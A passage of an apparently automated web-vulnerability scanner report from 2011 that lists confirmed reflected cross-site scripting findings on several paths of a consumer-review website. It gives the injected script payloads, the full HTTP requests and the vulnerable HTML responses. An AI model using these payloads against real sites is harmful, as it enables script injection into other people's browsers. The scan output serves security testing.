value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000C9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E

/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x0000DA)</script>

Request

GET /link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/link.php~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3526
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/link.php~'"--></style></script><script>netsparker(0x0000DA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000DA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E

/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x00010D)</script>

Request

GET /includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/includes/javascript.php?script=jquery.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/includes/'"--></style></script><script>netsparker(0x00010D)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00010D)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E

/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter | Type | Value
script | GET | jquery.js
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000144)</script>

Request

GET /includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000144)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3525
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.php'"--></style></script><script>netsparker(0x000144)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
